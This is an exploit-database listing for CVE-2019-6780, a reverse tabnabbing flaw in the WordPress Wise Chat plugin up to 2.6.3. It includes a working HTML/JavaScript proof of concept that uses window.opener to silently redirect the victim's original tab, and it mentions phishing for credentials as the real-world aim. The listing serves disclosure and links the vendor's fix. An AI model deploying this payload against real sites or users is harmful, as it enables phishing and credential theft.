[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Wisechat 2.6.3 Plugin - Reverse Tabnabbing Vulnerability

Author
MTK
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-32058
Category
web applications
Date add
25-01-2019
CVE
CVE-2019-6780
Platform
php
# Exploit Title: Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://kaine.pl/
# Softwae Link: https://wordpress.org/plugins/wise-chat/
# Version: Up to V2.6.3
# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
# CVE : 2019-6780.


# Plugin description:
Wise Chat is a leading chat plugin that helps to build a social network and to increase user engagement on your website by providing the possibility to exchange real time messages in chat rooms. The plugin is easily installable and extremely configurable. Its features list is growing all the time.

# POC
Send following URL on wise chat "http://mtk911.cf/OR/" which has the following html

<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://mtk911.cf/');
if (window.parent != window) window.parent.location.replace('http://mtk911.cf/');
</script>
Open Redirect TEST
</html>

when you click on that user. This opens in a new tab, and the parent tab is silently redirected to my website without asking the user.

#Technical Details & Impact:
In a real life example, this would redirect to a phishing site to try gain credentials for users.

# References:
https://wordpress.org/plugins/wise-chat/#developers
https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk/src/rendering/filters/post/WiseChatLinksPostFilter.php
https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk#file6
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6780

#  0day.today [2024-12-25]  #